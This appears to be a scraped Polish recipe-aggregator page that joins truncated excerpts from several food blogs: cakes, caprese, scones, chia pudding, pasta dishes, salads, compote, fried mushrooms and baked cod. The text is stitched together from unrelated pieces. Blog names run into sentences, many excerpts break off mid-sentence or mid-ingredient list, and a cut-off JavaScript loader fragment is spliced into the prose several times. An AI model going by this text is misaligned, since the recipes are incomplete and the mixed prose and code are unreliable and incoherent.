Lubicie kolorowe ciasta? :) Ja spróbowałam zrobić proste, ale bardzo efektowne ciasto. Wyszło naprawdę bardzo fajnie, a całość dopełnił smak kiwi :) Jest to ciasto idealne dla fanów nie do końca słodkich ciast. Nuta cytryny jest rewelacyjna. Polecam :) Przepis z książki "Moje wypieki i desery". Bardzo dziękuje za inspirację :) SKŁADNIKI: CIASTO: 220 g mąki pszennej 200 g masła
Serce zamknięte w formie pysznościskarbnicę witamin – B, E, C, oraz składników mineralnych takich jak potas, wapń, magnez, żelazo i kwas foliowy. Zawiera też sporą ilość białka oraz błonnik. I voila! Kurpiowska , wegetariańska , prosta jak drut przekąska gotowa. Chrupiąca, pełna aromatu i wspomnień. Teraz już wiem, co zrobię z kuleczką ciasta pierogowego, które mi zostanie następnym razem! Prościej być nie może! Smacznego
Z Kuchni Do KuchniCAPRESE - pod tą obco brzmiącą nazwą kryje się prosta w przygotowaniu włoska sałatka, w skład której wchodzą przede wszystkim mozzarella i pomidory. Jej wygląd przywodzi na myśl kolory włoskiej flagi i tak jak tamtejszy klimat - lekka, orzeźwiająca - idealna na upały... lecz nie tylko. Choć mało skomplikowana w przyrządzeniu, to jeśli zadbamy o kilka detali może być efektowną przystawką, która
smacznieinatematmówią, że wszystko da się zrobić w 15 minut. Nie doliczają 30 minut na krojenie, mycie i odmierzanie. Kiedy będziesz miał wszystko na blacie, samo gotowanie będzie banalnie proste. Wyjmij też wszystkie sprzęty, których użyjesz lub miej je przygotowane . Jest mały druczek w tej umowie. Warto mieć zmywarkę . Stosy misek po gotowaniu kiedyś były moją zmorą. Na szczęście
W kuchni wieczoremScones . Każdy chyba o nich słyszał, wielu je jadło, a ci, którym smakowało, próbowali przygotować je w domu. Najprawdopodobniej z dobrym skutkiem, bo są one wyjątkowo proste do upieczenia. Choć w pewnych kręgach uważane są za bułeczki, nie ma w ich składzie drożdży, które dla niektórych bywają problematyczne. Jakoś tak się złożyło, że nie miałam okazji
Pożeraczka, czyli raz adobrzeżywnością, nie wahałam się ani chwili. Od razu postanowiłam je wypróbować robiąc popularny "pudding chia". Powiem szczerze-od razu sie zakochałam. Okazało się, że przygotowanie takiego puddingu jest dziecinnie proste, praktycznie robi się sam. Ponieważ nasionka nie mają za bardzo smaku, możemy używać różnych dodatków uzyskując różne wersje smakowe. Gotowy pudding możemy przechowywać w lodówce nawet kilka
Zawsze głodna!proste danie można przygotować w niecałe pół godziny, więc świetnie sprawdza się w sytuacjach awaryjnych, na przykład podczas wizyty niespodziewanych, głodnych gości. Ja użyłem makaronu rigatoni, ale dobre będą też klasyczne rurki czy motylki. Danie będzie tym lepsze, im lepszej jakości śmietany użyjecie. Składniki (dla 4 osób): 500 g makaronu rigatoni 200 g wędzonego łososia w plastrach
W SMAKdobrze nie urozmaica obiadu jak surówka. Nawet jeśli kolejny dzień jemy tradycyjnego kotleta schabowego lub mielone, zmieniając dodatki stwarzamy nowe danie. Dziś prosta, szybka w wykonaniu, a przede wszystkim smaczna surówka. Taki dodatek do obiadu cieszy podniebienie i oczy. Czyż taka zdrowa, kolorowa suróweczka nie cieszy oczu? U mnie w domu nikt nie może się jej oprzeć. Składniki
Słodkie okruszkiCzasami się zdarza że chce nam się coś słodkiego a pod ręką nic nie mamy :) Polecam Wam takie oto pyszne , proste i szybkie w przygotowaniu kruche ciasto z powidłami i pianką
Sama słodycz i szczypta chilipieczywa; Wykonanie: Truskawki wstawiam do miski wieczorem, żeby na rano było rozmrożone. Twarożek kruszę i mieszam z miodem. Układam warstwy: twarożek, następnie pokruszone chlebki, truskawki, znów twarożek i truskawki. Proste, a jakie smaczne! function load(url, callback) { var xhr; if(typeof XMLHttpRequest !== 'undefined') xhr = new XMLHttpRequest(); else { var versions = ['MSXML2.XmlHttp.5.0', 'MSXML2.XmlHttp.4.0', 'MSXML2.XmlHttp.3.0', 'MSXML2.XmlHttp.2.0', 'Microsoft.XmlHttp
dom-agi.plWykonanie: Rabarbar umyć, oczyścić, pokroić w kawałki, zasypać cukrem i odstawić na godzinę. Po tym czasie zalać wodą dodać cukier wanilinowy i goździki. Gotować na małym ogniu do miękkości. Proste a jakie smaczne function load(url, callback) { var xhr; if(typeof XMLHttpRequest !== 'undefined') xhr = new XMLHttpRequest(); else { var versions = ['MSXML2.XmlHttp.5.0', 'MSXML2.XmlHttp.4.0', 'MSXML2.XmlHttp.3.0', 'MSXML2.XmlHttp.2.0', 'Microsoft.XmlHttp
dom-agi.plWykonanie: Kanie dokładnie myjemy, ale nie za długo, żeby nie nasiąkły wodą. Jajko rozbełtujemy z przyprawami, moczymy kanie w jajku, następnie w bułce tartej i smażymy na złoty kolor. Proste i pyszne! function load(url, callback) { var xhr; if(typeof XMLHttpRequest !== 'undefined') xhr = new XMLHttpRequest(); else { var versions = ['MSXML2.XmlHttp.5.0', 'MSXML2.XmlHttp.4.0', 'MSXML2.XmlHttp.3.0', 'MSXML2.XmlHttp.2.0', 'Microsoft.XmlHttp
dom-agi.plczułam się fatalnie, niezależnie od rodzaju ryby, od miejsca zakupu, tak po prostu. Już dawno nie jestem w ciąży, ale ryba gości u nas sporadycznie, najczęściej w postaci prostej, wyfiletowanej, obtoczonej w mące i usmażonej. Pieczony dorsz miał być czymś innym, owszem smaczny, warzywa dodają smaku, cytryna idealnie nadaje się do ryb, ale ja chyba po prostu nie należę
dom-agi.plwymagające dużego nakładu pracy i czasu obiady. Miałam w zamrażarce trochę szpinaku, w lodówce ser pleśniowy i od razu pomyślałam, że będzie to połączenie idealne. Przepis jest bardzo prosty, a smak na prawdę wyjątkowy, tak powstał makaron z sosem szpinakowo-serowym. Pamiętam jak się mówiło, że dzieci nie lubią szpinaku, może dlatego, że sam w sobie jest mdły, chociaż(...)żelaza, co przy skłonnościach do anemii lub przy wypijanych ogromnie dużych ilościach kawy jest niezwykle ważne. Dzieci zajadają się szpinakiem z apetytem, co mnie niezwykle cieszy. Polecam wszystkim, smaczny prosty obiad. Składniki: - 300 g szpinaku (ja użyłam mrożonego) - 30 dag mięsa mielonego (może być drobiowe, może być wieprzowe) - 10 dag sera typu rokpol - 1/2 szklanki mleka - szklanka bulionu warzywnego
dom-agi.plpołączenia składników. Piekarnik nagrzać do temperatury 175 stopni. Formę na babkę wysmarować tłuszczem i wysypać bułką tartą, przełożyć masę. Wstawić do rozgrzanego piekarnika i piec około 50-60 minut. Proste i pyszne Smacznego function load(url, callback) { var xhr; if(typeof XMLHttpRequest !== 'undefined') xhr = new XMLHttpRequest(); else { var versions = ['MSXML2.XmlHttp.5.0', 'MSXML2.XmlHttp.4.0', 'MSXML2.XmlHttp.3.0', 'MSXML2.XmlHttp.2.0', 'Microsoft.XmlHttp
dom-agi.pl